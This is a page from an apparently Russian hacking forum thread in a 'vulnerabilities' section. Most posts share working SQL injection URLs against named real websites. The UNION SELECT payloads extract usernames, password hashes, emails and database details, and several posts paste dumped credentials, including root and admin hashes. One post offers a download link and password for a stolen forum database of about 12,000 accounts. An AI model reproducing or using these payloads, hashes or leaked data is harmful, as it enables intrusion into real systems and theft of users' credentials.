ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #451  
Старый 10.02.2007, 00:48
Аватар для }{0TT@БЬ)Ч
}{0TT@БЬ)Ч
Постоянный
Регистрация: 20.01.2006
Сообщений: 302
Провел на форуме:
3536885

Репутация: 447
По умолчанию

Цитата:
Сообщение от }{0TT@БЬ)Ч  
http://forum.siemens-club.ru/viewboard.php?BoardID=-29+union+select+1,concat(username,char(58),passwor d),3,4,5,6,7,8,9,10+from+t_users/*
Кто сменил юзера? стукни в асю пообщаемся.

Последний раз редактировалось }{0TT@БЬ)Ч; 16.02.2007 в 01:38..
 
Ответить с цитированием

  #452  
Старый 10.02.2007, 01:12
Аватар для kamaz
kamaz
Познающий
Регистрация: 31.01.2007
Сообщений: 88
Провел на форуме:
631013

Репутация: 453
Отправить сообщение для kamaz с помощью ICQ
По умолчанию

http://www.oilsbyobletz.com/public/view_text.php?user_id=4%20union%20select%201,2,3,4 ,5,6,7,8/*

http://www.rusfmpro.ru/index.php?menu%5B0%5D=56&&user_id=-5%20union%20select%201,2,email,4,5,6,7,8,9,0,name, 12,13,14,15,16,17%20from%20users/*

http://www.naobcasach.pl/art.php?id=79%20union%20select%201,2,3,4,5,6,7,8,9 ,0,11,12,13/*
 
Ответить с цитированием

  #453  
Старый 10.02.2007, 01:15
Аватар для guest3297
guest3297
Banned
Регистрация: 27.06.2006
Сообщений: 1,614
Провел на форуме:
3887520

Репутация: 2996


По умолчанию

офф топ

Цитата:
У тебя конструкция concat(user(),char(58),password()) прошла?
Ми пад сталом, спасибо побольше бы таких постов...
 
Ответить с цитированием

  #454  
Старый 10.02.2007, 01:18
Аватар для Goudini
Goudini
Участник форума
Регистрация: 07.06.2006
Сообщений: 146
Провел на форуме:
1652093

Репутация: 490
Отправить сообщение для Goudini с помощью ICQ
По умолчанию

Код:
http://ufs.com.ua/stories/showlaw.php?id=-1+union+select+concat(user,char(58),password),2,3+from+mysql.user/*
root:
nobody:46243a7171240b83
debian-sys-maint:51c3ad74176de8e5
daru:

Код:
http://www.contrast.net.ua/heating/pos.php?id=-1+union+select+1,2,3,4,5/*
Код:
http://www.a2k.org.ua/news.php?id=-1+union+select+1,2,3,4,password,user,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38+from+users+where+id=1/*
Код:
http://pressa.univ.kiev.ua/news.php?id=-1+union+select+1,2,4,3/*
Код:
http://www.fdr.com.ua/article.php?id=-1+union+select+1,2,3,4,5,6,7,8/*
Код:
http://www.untp.org.ua/index.php?id=-1+union+select+1,2,3,4,5,6/*
Код:
http://www.management.com.ua/news/?id=-1+union+select+1,2,3/*
Код:
http://www.scg.com.ua/mc_news.php?id=-1+union+select+1,2,3,4/*
 
Ответить с цитированием

  #455  
Старый 10.02.2007, 03:58
Аватар для Thanat0z
Thanat0z
Постоянный
Регистрация: 06.12.2006
Сообщений: 762
Провел на форуме:
5352530

Репутация: 2062


По умолчанию

_http://rapidshare.com/files/15758988/base_forum_siemens-club_ru.rar

login pass email icq (txt + xls) 400kb
pass:a-chat

количество записей :12266
6-знаков: 214
7-знаков: 326

Не менее 40 из них брутятся.
Самый стойкий криптографически пасс: ДяДяАдМиНиМоДеРаТоРпРоСтИ зАсРа

Последний раз редактировалось Thanat0z; 10.02.2007 в 20:09..
 
Ответить с цитированием

  #456  
Старый 10.02.2007, 13:24
Аватар для InferNo23
InferNo23
Участник форума
Регистрация: 05.09.2006
Сообщений: 187
Провел на форуме:
6860213

Репутация: 378
По умолчанию

Restko.ru
12000 юзеров

http://restko.ru/print_market.php?market_id=-1+union+select+1,email,3,4,5,6,7,8,9,10,11,12,13,1 4,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30, pass,32,33+from+user+limit+12000,12001/*
и

http://restko.ru/print_market.php?market_id=-1+union+select+1,login,3,4,5,6,7,8,9,10,11,12,13,1 4,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30, pass,32,33+from+admin+limit+1,2/*
 
Ответить с цитированием

  #457  
Старый 10.02.2007, 18:09
Аватар для RaDDeaD
RaDDeaD
Познающий
Регистрация: 28.12.2006
Сообщений: 44
Провел на форуме:
119257

Репутация: 56
По умолчанию

Цитата:
Сообщение от InferNo23  
Restko.ru
12000 юзеров

http://restko.ru/print_market.php?market_id=-1+union+select+1,email,3,4,5,6,7,8,9,10,11,12,13,1 4,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30, pass,32,33+from+user+limit+12000,12001/*
и

http://restko.ru/print_market.php?market_id=-1+union+select+1,login,3,4,5,6,7,8,9,10,11,12,13,1 4,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30, pass,32,33+from+admin+limit+1,2/*

Также может понадобиться
:
http://www.restko.ru/usr/
есть таблица id
 
Ответить с цитированием

  #458  
Старый 10.02.2007, 18:12
Аватар для InferNo23
InferNo23
Участник форума
Регистрация: 05.09.2006
Сообщений: 187
Провел на форуме:
6860213

Репутация: 378
По умолчанию

Код:
http://www.novostroy.ru/directrix/details.php?item_id=-1+union+select+1,password,3,name,email,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26+from+users+limit+1,2/*
Код:
http://www.bench-mark.ru/main.php?root_id=&text_id=-1+union+select+1,user(),3,version(),5/*
Код:
http://fpmt.ru/index.php?aid=-1+union+select+version()
Код:
http://www.wnqsport.ru/showtext.php?text_id=-1+union+select+1,2,versioN(),4,5,6/*
Код:
http://www.theolcom.ru/ru/full_text.php?TEXT_ID=-1+union+select+1,2,3,4,table_name,6,7+from+INFORMATION_SCHEMA.TABLES+limit+4,5/*
 
Ответить с цитированием

  #459  
Старый 10.02.2007, 18:49
Аватар для злюка
злюка
Постоянный
Регистрация: 11.11.2005
Сообщений: 317
Провел на форуме:
2848854

Репутация: 409
Отправить сообщение для злюка с помощью ICQ
По умолчанию

какой то филиал Центр-Телекома
_http://www.kosnet.ru/modules/myarticles/topics.php?op=listarticles&topic_id=-99+union+select+1,2,3,concat(uid,0x3a,uname,0x3a,p ass),5+from+kosnet_users/*

пасс сложный пробрутить не удалось
 
Ответить с цитированием

  #460  
Старый 10.02.2007, 19:38
Аватар для n0ne
n0ne
Постоянный
Регистрация: 01.01.2007
Сообщений: 796
Провел на форуме:
2693408

Репутация: 861


По умолчанию

Код:
http://gammer.itc.ua/?a=genre&upid=-4+union+select+concat(user,0x3a,password)+from+mysql.user/*
root:7f269a3e6508d1ec

Код:
http://www.ipecac.com/bio.php?id=-44+union+select+1,2,user(),concat(database(),0x3a,0x3a,version())/*
Код:
http://www.iwf.ru/main/bar2.php?idd=-370+union+select+1,concat(username,0x3a,password),3,4,5,6,7,8+from+users/*
от админки пароль в другой таблице, подобрать не смог

Код:
http://www.press.pl/lewa_strona/show.php?idd=-25+union+select+1,2,concat(user(),0x3a,0x3a,version(),0x3a,0x3a,database()),4,5,6,7,8,9,10,11,12,13,14,15/*
Код:
http://www.fcuniversitatea.ro/index.php?idd=-440+union+select+1,concat(convert(version()+using+latin1),0x3a,0x3a,convert(user()+using+latin1),0x3a,0x3a,convert(database()+using+latin1)),3,4,5,6,7,8,9,10,11/*
Код:
http://www.euros.com.ua/goods.php?idd=-15+union+select+1,2,3,concat(version(),0x3a,0x3a,user(),0x3a,0x3a,version()),5,6,7/*&id=4
Код:
http://www.chelindustry.ru/view2.php?idd=-137+union+select+1,2,3,4,5,6,7,8,9,10,concat(version(),0x3a,0x3a,user(),0x3a,0x3a,database()),12,13,14,15/*
Код:
http://www.tol.cz/q-a/index.php?IdD=-15+union+select+concat(version(),0x3a,0x3a,user(),0x3a,0x3a,database())/*
Код:
http://www.miedz.net/rz/zawodnik.php?idd=-106+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,concat(version(),0x3a,0x3a,user(),0x3a,0x3a,database()),18/*
Код:
http://www.magit.pl/multimedia_new/index.php?idd=-5+union+select+concat(login,0x3a,password),2+from+users/*
admin:a4054b18b2e7f8c3688bbaa418323baf


чё-то на логин\пассы сёдня не проперло
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Обнаружение Sql инъекций в Oracle, часть вторая k00p3r Чужие Статьи 0 13.06.2005 11:26
SQL инъекция и Oracle, часть 2 k00p3r Чужие Статьи 0 13.06.2005 11:24
Sql инъекция и Oracle, часть первая k00p3r Чужие Статьи 0 13.06.2005 11:23
Внедрение Sql кода с завязанными глазами k00p3r Чужие Статьи 0 12.06.2005 20:48
SQL Injection в Oracle k00p3r Чужие Статьи 0 12.06.2005 12:41



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ